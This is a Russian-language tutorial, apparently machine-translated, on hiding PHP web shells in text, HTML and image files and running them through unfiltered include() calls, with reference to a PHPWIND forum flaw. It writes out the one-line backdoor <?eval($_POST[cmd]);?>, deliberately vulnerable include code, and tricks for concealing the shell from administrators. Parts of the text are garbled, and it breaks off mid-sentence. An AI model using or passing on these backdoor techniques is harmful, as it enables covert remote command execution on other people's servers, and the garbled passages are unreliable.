Вы должны знать, что если вы просто поместите оператор PHP в изображение, он все равно не будет выполнен, поскольку PHP анализирует только файлы с расширением php. Поэтому необходимо иметь возможность выполнять операторы PHP, скрытые на картинке. Мы просто используем вызывающие функции в PHP: include, require и т.д.
Мы до сих пор помним статью о сокрытии троянов на картинках, вышедшую несколько дней назад. То есть используйте такие операторы, как include("x.gif") в файле PHP, для вызова операторов троянского коня, скрытых в изображении. Утверждения в ASP аналогичны. Оно кажется очень скрытым, но если вызвать изображение напрямую, тому, кто немного разбирается в PHP, не составит труда найти что-то подозрительное. Поскольку передать параметры с помощью метода GET в URL-адресе сложно, производительность внедрения троянской программы не может быть полностью использована.
Функция включения часто используется в PHP, поэтому она вызывает слишком много проблем с безопасностью. Например, уязвимость PHPWIND1.36 вызвана отсутствием фильтрации переменных, стоящих за включением. На основе этого мы можем создавать аналогичные операторы для вставки в файлы PHP. Затем спрячьте трояна в изображении или HTML-файле, который, можно сказать, более скрытен. Например, вставьте следующий оператор в форум PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? < mailto:?@include 'includ/'.$PHPWIND_ROOT;?>>Общие администраторы не смогут его увидеть.
С помощью функции включения мы можем скрыть PHP-трояны во многих типах файлов, таких как txt, html и файлы изображений. Поскольку эти три типа файлов — txt, html и файлы изображений — наиболее распространены на форумах и в системах статей, мы проведем тесты по порядку ниже.
Сначала создайте файл PHP test.php. Содержимое файла:
<?php.
$test=$_GET['тест'];
@include 'test/'.$test;
?>
Txt-файлы обычно представляют собой файлы описаний, поэтому мы можем поместить трояна, состоящего из одного предложения, в файл описания каталога. Просто создайте TXT-файл t.txt. Вставляем предложение Trojan <?eval($_POST[cmd]);?> в файл t.txt. Затем посетите http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt > Если вы видите файл t. содержимое txt оказывается в порядке. Затем добавьте адрес трояна бэкдор-клиента lanker micro PHP в http://localhost/test/test.php?test=../t.txt < http://localhost/phpw/index.php? PHPWIND_ROOT=../robots.txt > Просто добавьте cmd в пароль, и вы увидите результаты, возвращаемые выполнением.
HTML-файлы обычно представляют собой файлы шаблонов. Чтобы троянский конь, вставленный в HTML-файл, мог вызываться и выполняться без отображения, мы можем добавить в HTML текстовое поле со скрытыми атрибутами, например: <input type=hidden value="<?eval($) _POST[cmd ]);?>"> Затем используйте тот же метод, что и выше. Возвращаемые результаты выполнения обычно можно увидеть, просмотрев исходный файл. Например, воспользуйтесь функцией просмотра каталога этой программы. Просмотрите содержимое исходного файла как <input type=hidden value="C:Uniserver2_7swwwtest"> Я могу получить каталог как C:Uniserver2_7swwwtest.
Теперь поговорим о файлах изображений. Самый ядовитый трюк — спрятать троянского коня в изображении. Мы можем напрямую отредактировать изображение и вставить <?eval($_POST[cmd]);?> в конец изображения.
После тестирования на картинку это вообще не влияет. Затем таким же образом добавьте адрес клиентского трояна<